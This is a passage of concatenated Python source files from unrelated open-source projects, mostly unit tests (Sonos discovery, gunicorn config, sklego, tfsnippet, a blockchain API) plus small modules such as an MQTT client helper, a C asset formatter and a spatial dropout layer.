if reverse and extend:
await travel(await get_child(lo))
await travel(self.root)
self.a_command_done(token)
return result
|
142832
|
import socket
import select
import ipaddress
import ifaddr
from collections import OrderedDict
from unittest.mock import patch, MagicMock as Mock, PropertyMock, call
from soco import discover
from soco import config
from soco.discovery import (
any_soco,
by_name,
_find_ipv4_addresses,
_find_ipv4_networks,
_check_ip_and_port,
_is_sonos,
_sonos_scan_worker_thread,
scan_network,
)
IP_ADDR = "192.168.1.101"
TIMEOUT = 5
class TestDiscover:
def test_discover(self, monkeypatch):
# Create a fake socket, whose data is always a certain string
monkeypatch.setattr("socket.socket", Mock())
sock = socket.socket.return_value
sock.recvfrom.return_value = (
b"SERVER: Linux UPnP/1.0 Sonos/26.1-76230 (ZPS3)",
[IP_ADDR],
        )  # (data, address)
# Return a couple of IP addresses from _find_ipv4_addresses()
monkeypatch.setattr(
"soco.discovery._find_ipv4_addresses",
Mock(return_value={"192.168.0.15", "192.168.1.16"}),
)
# Prevent creation of soco instances
monkeypatch.setattr("soco.config.SOCO_CLASS", Mock())
# Fake return value for select
monkeypatch.setattr("select.select", Mock(return_value=([sock], 1, 1)))
# Set timeout
TIMEOUT = 2
discover(timeout=TIMEOUT)
# 6 packets in total should be sent (3 to
# 192.168.0.15 and 3 to 192.168.1.16)
assert sock.sendto.call_count == 6
# select called with the relevant timeout
select.select.assert_called_with([sock, sock], [], [], min(TIMEOUT, 0.1))
# SoCo should be created with the IP address received
config.SOCO_CLASS.assert_called_with(IP_ADDR)
# Now test include_visible parameter. include_invisible=True should
# result in calling SoCo.all_zones etc
# Reset gethostbyname, to always return the same value
monkeypatch.setattr("socket.gethostbyname", Mock(return_value="192.168.1.15"))
config.SOCO_CLASS.return_value = Mock(all_zones="ALL", visible_zones="VISIBLE")
assert discover(include_invisible=True) == "ALL"
assert discover(include_invisible=False) == "VISIBLE"
# If select does not return within timeout SoCo should not be called
# at all
# Simulate no data being returned within timeout
select.select.return_value = (0, 1, 1)
discover(timeout=1)
# Check no SoCo instance created
        config.SOCO_CLASS.assert_not_called()
def test_by_name():
"""Test the by_name method"""
devices = set()
for name in ("fake", "non", "Kitchen"):
mymock = Mock(player_name=name)
devices.add(mymock)
# The mock we want to find is the last one
mock_to_be_found = mymock
# Patch out discover and test
with patch("soco.discovery.discover") as discover_:
discover_.return_value = devices
# Test not found
device = by_name("Living Room")
assert device is None
discover_.assert_called_once_with(allow_network_scan=False)
# Test found
device = by_name("Kitchen")
assert device is mock_to_be_found
discover_.assert_has_calls(
[call(allow_network_scan=False), call(allow_network_scan=False)]
)
# Tests for scan_network()
def test__find_ipv4_networks(monkeypatch):
_set_up_adapters(monkeypatch)
# Check that we get the expected networks; test different min_netmask values
assert ipaddress.ip_network("192.168.0.55/24", False) in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/24", False) in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/16", False) not in _find_ipv4_networks(24)
assert ipaddress.ip_network("192.168.1.1/16", False) in _find_ipv4_networks(16)
assert ipaddress.ip_network("192.168.1.1/16", False) in _find_ipv4_networks(0)
assert ipaddress.ip_network("192.168.3.11/8", False) not in _find_ipv4_networks(8)
assert ipaddress.ip_network("127.0.0.1/24", False) not in _find_ipv4_networks(24)
assert ipaddress.ip_network("169.254.1.10/16", False) not in _find_ipv4_networks(16)
def test__find_ipv4_addresses(monkeypatch):
_set_up_adapters(monkeypatch)
assert _find_ipv4_addresses() == {"192.168.0.1", "192.168.1.1", "192.168.3.11"}
def test__check_ip_and_port(monkeypatch):
_setup_sockets(monkeypatch)
assert _check_ip_and_port("192.168.0.1", 1400, 0.1) is True
assert _check_ip_and_port("192.168.0.1", 1401, 0.1) is False
assert _check_ip_and_port("192.168.0.3", 1400, 0.1) is False
def test__is_sonos(monkeypatch):
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
assert _is_sonos("192.168.0.1") is True
assert _is_sonos("192.168.0.2") is True
assert _is_sonos("192.168.0.3") is False
def test__sonos_scan_worker_thread(monkeypatch):
_setup_sockets(monkeypatch)
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
ip_set = {"192.168.0.1", "192.168.0.2", "192.168.0.3"}
sonos_ip_addresses = []
_sonos_scan_worker_thread(ip_set, 0.1, sonos_ip_addresses, False)
assert len(sonos_ip_addresses) == 1
assert (
"192.168.0.1" in sonos_ip_addresses or "192.168.0.2" in sonos_ip_addresses
)
assert "192.168.0.3" not in sonos_ip_addresses
ip_set = {"192.168.0.1", "192.168.0.2", "192.168.0.3"}
sonos_ip_addresses = []
_sonos_scan_worker_thread(ip_set, 0.1, sonos_ip_addresses, True)
assert len(sonos_ip_addresses) == 2
assert {"192.168.0.1", "192.168.0.2"} == set(sonos_ip_addresses)
assert "192.168.0.3" not in sonos_ip_addresses
def test_scan_network(monkeypatch):
_setup_sockets(monkeypatch)
_set_up_adapters(monkeypatch)
with patch("soco.config.SOCO_CLASS", new=_mock_soco_new):
assert "192.168.0.1" in scan_network(include_invisible=False)
assert "192.168.0.2" not in scan_network(include_invisible=False)
assert "192.168.0.1" in scan_network(
include_invisible=False, multi_household=True
)
assert "192.168.0.2" not in scan_network(
include_invisible=False, multi_household=True
)
assert "192.168.0.1" in scan_network(
include_invisible=True, multi_household=True
)
assert "192.168.0.2" in scan_network(include_invisible=True)
assert "192.168.0.2" in scan_network(
include_invisible=True, multi_household=True
)
# This one can take a few seconds to run; large address
# space, and large number of threads
assert "192.168.0.1" in scan_network(
include_invisible=False,
multi_household=True,
max_threads=15000,
min_netmask=16,
)
# Test specified networks
assert "192.168.0.1" in scan_network(
include_invisible=False, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.2" in scan_network(
include_invisible=True, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.2" not in scan_network(
include_invisible=False, networks_to_scan=["192.168.0.1/24"]
)
assert "192.168.0.1" in scan_network(networks_to_scan=[])
assert scan_network(networks_to_scan=["not_a_network", ""]) is None
# Helper functions for scan_network() tests
def _set_up_adapters(monkeypatch):
"""Helper function that creates a number of mock network adapters to be
returned by ifaddr.get_adapters()."""
private_24 = ifaddr.IP("192.168.0.1", 24, "private-24")
private_16 = ifaddr.IP("192.168.1.1", 16, "private-16")
public = ifaddr.IP("192.168.3.11", 8, "public")
loopback = ifaddr.IP("127.0.0.1", 24, "loopback")
link_local = ifaddr.IP("169.254.1.10", 16, "link_local")
ips = [private_24, private_16, public, loopback, link_local]
# Set up mock adapters
adapters = OrderedDict()
for index in range(len(ips)):
ip = ips[index]
adapters[ip.nice_name] = ifaddr._shared.Adapter(
ip.nice_name, ip.nice_name, [ip], index=index + 1
)
# Patch the response from ifaddr.get_adapters()
monkeypatch.setattr("ifaddr.get_adapters", Mock(return_value=adapters.values()))
def _mock_soco_new(ip_address):
"""Helper function that replaces the SoCo constructor. Returns Mock objects for
Sonos devices at two specific IP addresses."""
if ip_address in ["192.168.0.1", "192.168.0.2"]:
return Mock(
visible_zones=["192.168.0.1"], all_zones=["192.168.0.1", "192.168.0.2"]
)
else:
raise ValueError
def _setup_sockets(monkeypatch):
"""Helper function to create fake socket connection responses corresponding to
Sonos speakers on specific IP address / port combinations only."""
def mock_socket_connect_ex_return(_, address_port):
if address_port in [("192.168.0.1", 1400), ("192.168.0.2", 1400)]:
return 0
else:
return 1
monkeypatch.setattr("socket.socket.connect_ex", mock_socket_connect_ex_return)
|
142851
|
import mock
import pytest
from gunicorn.app.base import BaseApplication
from gunicorn.errors import ConfigError
from {{cookiecutter.package_name}} import ApplicationLoader
@mock.patch.object(BaseApplication, "run")
def test_wsgi_conf_defaults(run_mock):
app = mock.Mock()
wsgi = ApplicationLoader(app)
assert wsgi.load() == app
assert wsgi.cfg.worker_class_str == "uvicorn.workers.UvicornWorker"
assert wsgi.cfg.address == [("127.0.0.1", 8000)]
assert wsgi.cfg.env == {}
assert wsgi.cfg.settings["bind"].value == ["127.0.0.1:8000"]
assert wsgi.cfg.settings["raw_env"].value == []
assert wsgi.cfg.settings["workers"].value == 2
assert not wsgi.cfg.settings["daemon"].value
assert not wsgi.cfg.settings["pidfile"].value
wsgi.run()
run_mock.assert_called_once()
@mock.patch.object(BaseApplication, "run")
def test_wsgi_cli_overrides(run_mock):
app = mock.Mock()
wsgi = ApplicationLoader(
application=app,
overrides={
"raw_env": ("FOOBAR=123",),
"bind": "0.0.0.0:3000",
"workers": 3,
"daemon": True,
"pidfile": "/tmp/api.pid"
}
)
# Test unused patched method for coverage sake.
wsgi.init(None, None, None)
assert wsgi.cfg.address == [("0.0.0.0", 3000)]
assert wsgi.cfg.env == {"FOOBAR": "123"}
assert wsgi.cfg.settings["bind"].value == ["0.0.0.0:3000"]
assert wsgi.cfg.settings["raw_env"].value == ["FOOBAR=123"]
assert wsgi.cfg.settings["workers"].value == 3
assert wsgi.cfg.settings["daemon"].value
assert wsgi.cfg.settings["pidfile"].value == "/tmp/api.pid"
wsgi.run()
run_mock.assert_called_once()
def test_wsgi_bad_config():
app = mock.Mock()
with pytest.raises(SystemExit):
ApplicationLoader(
application=app,
overrides={
"unknown": True,
"workers": None,
}
)
|
142968
|
import logging
from assigner import manage_repos
from assigner.backends.exceptions import (
UserInAssignerGroup,
UserNotAssigned,
)
help = "Lock students out of repos"
logger = logging.getLogger(__name__)
def lock(args):
"""Sets each student to Reporter status on their homework repository so
they cannot push changes, etc.
"""
#pylint: disable=no-value-for-parameter
return manage_repos(args, _lock)
def _lock(repo, student):
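    """Lock a single student out of their repo. Returns True on success,
    False if the student is a group member or was never assigned."""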
try:
repo.lock(student["id"])
return True
except UserInAssignerGroup:
logging.info("%s cannot be locked out because they are a member of the group, skipping...", student["username"])
return False
except UserNotAssigned:
logging.info("%s has not been assigned for %s", repo.name, student["username"])
return False
def setup_parser(parser):
parser.add_argument("name",
help="Name of the assignment to lock.")
parser.add_argument("--section", nargs="?",
help="Section to lock")
parser.add_argument("--student", metavar="id",
help="ID of student whose assignment needs locking.")
parser.add_argument("--dry-run", action="store_true",
help="Don't actually do it.")
parser.set_defaults(run=lock)
|
142981
|
import os
import shutil
import time
from deeplens.dataflow.agg import counts
from deeplens.full_manager.condition import Condition
from deeplens.full_manager.full_manager import FullStorageManager
from deeplens.full_manager.full_video_processing import CropSplitter
from deeplens.media.youtube_tagger import YoutubeTagger
from deeplens.constants import *
from deeplens.tracking.contour import KeyPoints
from experiments.environ import logrecord
"""
I literally just want to make sure this iterator does what I think it does
I'm not going to worry about whether it's compatible with the storage manager
for now...
"""
def test_iteration(src):
youtubeTagger = YoutubeTagger(src, './train/processed_yt_bb_detection_train.csv')
for frame in youtubeTagger:
bb = frame['objects'][0]['bb']
bbstr = str(bb.x0) + ',' + str(bb.x1) + ',' + str(bb.y0) + ',' + str(bb.y1)
print(bbstr)
print(frame['objects'][0]['label'])
def test_put(src, cleanUp = False):
if cleanUp:
if os.path.exists('./videos'):
shutil.rmtree('./videos')
manager = FullStorageManager(None, CropSplitter(), 'videos')
start = time.time()
manager.put(src, os.path.basename(src), parallel = True, args={'encoding': XVID, 'size': -1, 'sample': 1.0, 'offset': 0, 'limit': -1, 'batch_size': 50, 'num_processes': 6})
print("Put time:", time.time() - start)
clips = manager.get(os.path.basename(src), Condition(label='person'))
pipelines = []
for c in clips:
pipelines.append(c[KeyPoints()])
result = counts(pipelines, ['one'], stats=True)
logrecord('full', ({'file': src}), 'get', str(result), 's')
test_put('./train/AACM71csS-Q.mp4', cleanUp=False)
|
142985
|
import setuptools
from sys import platform
# Use README for long description
with open('README.md', 'r') as readme_fp:
long_description = readme_fp.read()
with open('requirements.txt', 'r') as req_fp:
required_libs = req_fp.readlines()
# py_cui setup
setuptools.setup(
name='py_cui',
description='A widget and grid based framework for building command line user interfaces in python.',
long_description=long_description,
long_description_content_type='text/markdown',
version='0.1.4',
author='<NAME>',
author_email='<EMAIL>',
license='BSD (3-clause)',
packages=setuptools.find_packages(exclude=['docs','tests', 'examples', 'venv']),
install_requires=required_libs,
url='https://github.com/jwlodek/py_cui',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords='cui cli commandline user-interface ui',
python_requires='>=3.6',
)
|
143042
|
import numpy as np
import pytest
from sklego.common import flatten
from sklego.dummy import RandomRegressor
from tests.conftest import nonmeta_checks, regressor_checks, general_checks, select_tests
@pytest.mark.parametrize(
"test_fn",
select_tests(
flatten([general_checks, nonmeta_checks, regressor_checks]),
exclude=[
"check_sample_weights_invariance",
"check_methods_subset_invariance",
"check_regressors_train",
"check_sample_weights_list",
"check_sample_weights_pandas_series"
]
)
)
def test_estimator_checks(test_fn):
# Tests that are skipped:
# 'check_methods_subset_invariance': Since we add noise, the method is not invariant on a subset
# 'check_regressors_train': score is not always greater than 0.5 due to randomness
regr_normal = RandomRegressor(strategy="normal")
test_fn(RandomRegressor.__name__ + "_normal", regr_normal)
regr_uniform = RandomRegressor(strategy="uniform")
test_fn(RandomRegressor.__name__ + "_uniform", regr_uniform)
def test_values_uniform(random_xy_dataset_regr):
X, y = random_xy_dataset_regr
mod = RandomRegressor(strategy="uniform")
predictions = mod.fit(X, y).predict(X)
assert (predictions >= y.min()).all()
assert (predictions <= y.max()).all()
assert mod.min_ == pytest.approx(y.min(), abs=0.0001)
assert mod.max_ == pytest.approx(y.max(), abs=0.0001)
def test_values_normal(random_xy_dataset_regr):
X, y = random_xy_dataset_regr
mod = RandomRegressor(strategy="normal").fit(X, y)
assert mod.mu_ == pytest.approx(np.mean(y), abs=0.001)
assert mod.sigma_ == pytest.approx(np.std(y), abs=0.001)
def test_bad_values():
np.random.seed(42)
X = np.random.normal(0, 1, (10, 2))
y = np.random.normal(0, 1, (10, 1))
with pytest.raises(ValueError):
RandomRegressor(strategy="foobar").fit(X, y)
|
143047
|
import paho.mqtt.client as mqtt
import datetime
import logging as log
import cfg
from time import sleep,time
import json
import socket
conf = {}
# -------------------- mqtt events --------------------
def on_connect(lclient, userdata, flags, rc):
global conf
log.info("mqtt> connected with result code "+str(rc))
if(conf["mqtt"]["subscribe"]):
for sub in userdata["mqtt"]["subscriptions"]:
log.info("mqtt> Subscription to %s",sub)
lclient.subscribe(sub)
else:
log.info("mqtt> Subscriptions not enabled")
if(conf["mqtt"]["publish"]):
log.info("mqtt> Publishing enabled")
else:
log.info("mqtt> Publishing not enabled")
def ruler_loop_forever():
while(True):
sleep(10)
return
def mqtt_start(config,mqtt_on_message,start_looping):
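    """Create and connect an MQTT client, retrying until the broker is reachable.
    Wires up the on_connect/on_message callbacks and, when start_looping is True,
    starts the background network loop. Returns the client, or None when neither
    publishing nor subscribing is enabled in the config."""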
def mqtt_connect_retries(client):
connected = False
while(not connected):
try:
client.connect(config["mqtt"]["host"], config["mqtt"]["port"], config["mqtt"]["keepalive"])
connected = True
log.info( "mqtt> connected to "+config["mqtt"]["host"]+":"+str(config["mqtt"]["port"])+" with id: "+ cid )
except socket.error:
log.error("socket.error will try a reconnection in 10 s")
sleep(10)
return
global conf
conf = config
clientMQTT = None
if(config["mqtt"]["publish"] or config["mqtt"]["subscribe"]):
config["mqtt"]["enable"] = True
cid = config["mqtt"]["client_id"] +"_"+socket.gethostname()
clientMQTT = mqtt.Client(client_id=cid,userdata=config)
clientMQTT.on_connect = on_connect
clientMQTT.on_message = mqtt_on_message
mqtt_connect_retries(clientMQTT)
if(start_looping):
        # start the network loop in a background thread; when start_looping is False the caller drives the loop itself
clientMQTT.loop_start()
else:
config["mqtt"]["enable"] = False
return clientMQTT
|
143051
|
import textwrap
from ..formatter import AssetFormatter
wrapper = textwrap.TextWrapper(
initial_indent=' ', subsequent_indent=' ', width=80
)
def c_initializer(data):
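    """Render `data` (str or bytes) as a C brace initializer of comma-separated hex bytes."""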
if type(data) is str:
data = data.encode('utf-8')
values = ', '.join(f'0x{c:02x}' for c in data)
return f' = {{\n{wrapper.fill(values)}\n}}'
def c_declaration(types, symbol, data=None):
return textwrap.dedent(
'''\
{types} uint8_t {symbol}[]{initializer};
{types} uint32_t {symbol}_length{size};
'''
).format(
types=types,
symbol=symbol,
initializer=c_initializer(data) if data else '',
size=f' = sizeof({symbol})' if data else '',
)
def c_boilerplate(data, include, header=True):
lines = ['// Auto Generated File - DO NOT EDIT!']
if header:
lines.append('#pragma once')
lines.append(f'#include <{include}>')
lines.append('')
lines.extend(data)
return '\n'.join(lines)
@AssetFormatter(extensions=('.hpp', '.h'))
def c_header(symbol, data):
return {None: c_declaration('inline const', symbol, data)}
@c_header.joiner
def c_header(path, fragments):
return {None: c_boilerplate(fragments[None], include="cstdint", header=True)}
@AssetFormatter(components=('hpp', 'cpp'), extensions=('.cpp', '.c'))
def c_source(symbol, data):
return {
'hpp': c_declaration('extern const', symbol),
'cpp': c_declaration('const', symbol, data),
}
@c_source.joiner
def c_source(path, fragments):
include = path.with_suffix('.hpp').name
return {
'hpp': c_boilerplate(fragments['hpp'], include='cstdint', header=True),
'cpp': c_boilerplate(fragments['cpp'], include=include, header=False),
}
|
143099
|
from django.contrib import admin
from django.contrib.auth.admin import User
from server.models.collective import Collective, Session
from server.models.qualification import Qualification, QualificationGroup
from server.models.instruction import Instruction, Topic
from server.models.category import Category, CategoryGroup
from server.models.tour import Tour
from server.models.equipment import Equipment
from server.models.calendar import Calendar, Anniversary, Vacation
from server.user_admin import UserAdmin
from server.event_admin import InstructionAdmin, TourAdmin
# Register your models here.
# Auth.User
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
# Calendar
admin.site.register(Calendar)
admin.site.register(Anniversary)
admin.site.register(Vacation)
# Collective
admin.site.register(Collective)
admin.site.register(Session)
# Qualifications
admin.site.register(Qualification)
admin.site.register(QualificationGroup)
# Mixins
admin.site.register(Category)
admin.site.register(CategoryGroup)
admin.site.register(Tour, TourAdmin)
admin.site.register(Equipment)
# Instructions
admin.site.register(Instruction, InstructionAdmin)
admin.site.register(Topic)
|
143105
|
import copy
import numpy as np
import pytest
import tensorflow as tf
from tfsnippet.layers import as_gated
def safe_sigmoid(x):
return np.where(x < 0, np.exp(x) / (1. + np.exp(x)), 1. / (1. + np.exp(-x)))
class AsGatedHelper(object):
def __init__(self, main_ret, gate_ret):
self.main_args = None
self.gate_args = None
self.main_ret = main_ret
self.gate_ret = gate_ret
def __call__(self, *args, **kwargs):
scope = kwargs['scope']
if scope == 'main':
assert(self.main_args is None)
self.main_args = (args, copy.copy(kwargs))
return self.main_ret
elif scope == 'gate':
assert(self.gate_args is None)
self.gate_args = (args, copy.copy(kwargs))
return self.gate_ret
else:
raise RuntimeError()
class TestAsGated(tf.test.TestCase):
def test_as_gated(self):
main_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
gate_ret = np.random.normal(size=[2, 3, 4]).astype(np.float32)
activation_fn = object()
# default_name infer failed
with pytest.raises(ValueError,
match='`default_name` cannot be inferred'):
g = as_gated(AsGatedHelper(main_ret, gate_ret))
with self.test_session() as sess:
# test infer default name
f = AsGatedHelper(main_ret, gate_ret)
f.__name__ = 'f'
g = as_gated(f)
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
            self.assertTrue(g_ret.name.startswith('gated_f/'))
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test specify default name
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, sigmoid_bias=1., default_name='ff')
g_ret = g(1, xyz=2, activation_fn=activation_fn)
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 1.))
            self.assertTrue(g_ret.name.startswith('gated_ff/'))
self.assertEqual(
f.main_args,
(
(1,),
{'xyz': 2, 'activation_fn': activation_fn, 'scope': 'main'}
)
)
self.assertEqual(
f.gate_args,
(
(1,),
{'xyz': 2, 'scope': 'gate'}
)
)
# test using `name`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, name='name')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
            self.assertTrue(g_ret.name.startswith('name/'))
# test using `scope`
f = AsGatedHelper(main_ret, gate_ret)
g = as_gated(f, default_name='f')
g_ret = g(1, xyz=2, activation_fn=activation_fn, scope='scope')
np.testing.assert_allclose(
sess.run(g_ret), main_ret * safe_sigmoid(gate_ret + 2.))
            self.assertTrue(g_ret.name.startswith('scope/'))
|
143113
|
from django.test import override_settings
from rest_framework import status
from thenewboston_node.business_logic.tests.base import as_primary_validator, force_blockchain
API_V1_LIST_BLOCKCHAIN_STATE_URL = '/api/v1/blockchain-states-meta/'
def test_memory_blockchain_supported(api_client, memory_blockchain, primary_validator_key_pair):
with force_blockchain(memory_blockchain):
with override_settings(NODE_SIGNING_KEY=primary_validator_key_pair.private):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == status.HTTP_200_OK
def test_can_list_blockchain_state_meta(api_client, file_blockchain_with_two_blockchain_states, pv_network_address):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_0['last_block_number'] == expected
assert blockchain_state_0['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/0000000000000000000!-blockchain-state.msgpack.gz'
)
assert len(blockchain_state_0['urls']) == 1
assert blockchain_state_0['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/0000000000000000000!-blockchain-state.msgpack.gz'
)
assert blockchain_state_1['last_block_number'] == 1
# TODO(dmu) CRITICAL: Stabilize unittests and remove `or`
assert blockchain_state_1['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack'
) or blockchain_state_1['url_path'] == (
'/blockchain/blockchain-states/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack.gz'
)
assert len(blockchain_state_1['urls']) == 1
assert blockchain_state_1['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack'
) or blockchain_state_1['urls'][0] == (
f'{pv_network_address}blockchain/blockchain-states'
'/0/0/0/0/0/0/0/0/00000000000000000001-blockchain-state.msgpack.gz'
)
def test_can_sort_ascending_blockchain_states_meta(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=last_block_number')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_0['last_block_number'] == expected
assert blockchain_state_1['last_block_number'] == 1
def test_can_sort_descending_blockchain_states_meta(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-last_block_number')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
blockchain_state_0, blockchain_state_1 = data['results']
assert blockchain_state_0['last_block_number'] == 1
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert blockchain_state_1['last_block_number'] == expected
def test_can_get_blockchain_states_meta_w_limit(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?limit=1')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
expected = file_blockchain_with_two_blockchain_states.get_first_blockchain_state().last_block_number
assert data['results'][0]['last_block_number'] == expected
def test_can_get_blockchain_states_meta_w_offset(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?limit=1&offset=1')
assert response.status_code == 200
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
assert data['results'][0]['last_block_number'] == 1
def test_pagination_is_applied_after_ordering(api_client, file_blockchain_with_two_blockchain_states):
with force_blockchain(file_blockchain_with_two_blockchain_states), as_primary_validator():
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?offset=1&ordering=-last_block_number')
assert response.status_code == status.HTTP_200_OK
data = response.json()
assert data['count'] == 2
assert len(data['results']) == 1
assert data['results'][0]['last_block_number'] == -1
|
143117
|
import theano
import theano.tensor as T
import lasagne as nn
from lasagne.layers import Layer
from lasagne.random import get_rng
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
class SpatialDropoutLayer(Layer):
"""Spatial dropout layer
Sets whole filter activations to zero with probability p. See notes for
disabling dropout during testing.
Parameters
----------
incoming : a :class:`Layer` instance or a tuple
the layer feeding into this layer, or the expected input shape
p : float or scalar tensor
The probability of setting a value to zero
rescale : bool
If true the input is rescaled with input / (1-p) when deterministic
is False.
Notes
-----
    The spatial dropout layer is a regularizer that randomly sets the values
    of whole feature maps to zero. This is an adaptation of normal dropout,
    which is generally useful in fully convolutional settings, such as [1]_.
It is also called a feature dropout layer.
During training you should set deterministic to false and during
testing you should set deterministic to true.
If rescale is true the input is scaled with input / (1-p) when
deterministic is false, see references for further discussion. Note that
this implementation scales the input at training time.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., <NAME>. (2016):
Deep Learning for Human Part Discovery in Images. IEEE
International Conference on Robotics and Automation (ICRA), IEEE,
2016.
"""
def __init__(self, incoming, p=0.5, rescale=True, **kwargs):
super(SpatialDropoutLayer, self).__init__(incoming, **kwargs)
self._srng = RandomStreams(get_rng().randint(1, 2147462579))
self.p = p
self.rescale = rescale
def get_output_for(self, input, deterministic=False, **kwargs):
"""
Parameters
----------
input : tensor
output from the previous layer
deterministic : bool
If true dropout and scaling is disabled, see notes
"""
if deterministic or self.p == 0:
return input
else:
# Using theano constant to prevent upcasting
one = T.constant(1)
retain_prob = one - self.p
if self.rescale:
input /= retain_prob
            mask = self._srng.binomial(input.shape[:2], p=retain_prob,
                                       dtype=theano.config.floatX)
axes = [0, 1] + (['x'] * (input.ndim - 2))
mask = mask.dimshuffle(*axes)
return input * mask
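if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module; the input shape and
    # filter count are illustrative assumptions): place the layer after a
    # convolution and build the train/test output expressions.
    l_in = nn.layers.InputLayer((None, 16, 32, 32))
    l_conv = nn.layers.Conv2DLayer(l_in, num_filters=32, filter_size=3)
    l_drop = SpatialDropoutLayer(l_conv, p=0.25)
    train_expr = nn.layers.get_output(l_drop, deterministic=False)  # dropout active
    test_expr = nn.layers.get_output(l_drop, deterministic=True)    # dropout disabled
    print(nn.layers.get_output_shape(l_drop))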
|
143131
|
import os
from robustness import datasets, model_utils
from torchvision import models
from torchvision.datasets import CIFAR100
import torch as ch
from . import constants as cs
from . import fine_tunify
from .custom_models.vision_transformer import *
pytorch_models = {
'alexnet': models.alexnet,
'vgg16': models.vgg16,
'vgg16_bn': models.vgg16_bn,
'squeezenet': models.squeezenet1_0,
'densenet': models.densenet161,
'shufflenet': models.shufflenet_v2_x1_0,
'mobilenet': models.mobilenet_v2,
'resnext50_32x4d': models.resnext50_32x4d,
'mnasnet': models.mnasnet1_0
}
vitmodeldict = {
# ImageNet
'deit_tiny_patch16_224': deit_tiny_patch16_224,
'deit_small_patch16_224': deit_small_patch16_224,
'deit_base_patch16_224': deit_base_patch16_224,
'deit_base_patch16_384': deit_base_patch16_384,
##CIFAR10
'deit_tiny_patch4_32': deit_tiny_patch4_32,
'deit_small_patch4_32': deit_small_patch4_32,
'deit_base_patch4_32': deit_base_patch4_32,
}
TRANSFER_DATASETS = ['cifar10', 'cifar100']
def get_dataset_and_loaders(args, shuffle_train=True, shuffle_val=False):
'''Given arguments, returns a datasets object and the train and validation loaders.
'''
if args.dataset in ['imagenet', 'stylized_imagenet']:
ds = datasets.ImageNet(args.data)
img_size = 224
elif args.dataset == 'cifar10':
ds = datasets.CIFAR(args.data)
ds.transform_train = cs.TRAIN_TRANSFORMS
ds.transform_test = cs.TEST_TRANSFORMS
img_size = 32
elif args.dataset == 'cifar100':
ds = datasets.CIFAR(args.data, num_classes=100, name='cifar100',
mean=[0.5071, 0.4867, 0.4408],
std=[0.2675, 0.2565, 0.2761])
ds.transform_train = cs.TRAIN_TRANSFORMS
ds.transform_test = cs.TEST_TRANSFORMS
ds.custom_class = CIFAR100
img_size = 32
train_loader, val_loader = ds.make_loaders(only_val=args.eval_only, batch_size=args.batch_size,
workers=args.workers, shuffle_train=shuffle_train, shuffle_val=shuffle_val)
return ds, train_loader, val_loader
def resume_finetuning_from_checkpoint(args, ds, finetuned_model_path):
'''Given arguments, dataset object and a finetuned model_path, returns a model
with loaded weights and returns the checkpoint necessary for resuming training.
'''
print('[Resuming finetuning from a checkpoint...]')
arch, add_custom_forward = get_arch(args)
if args.dataset in TRANSFER_DATASETS:
model, _ = model_utils.make_and_restore_model(
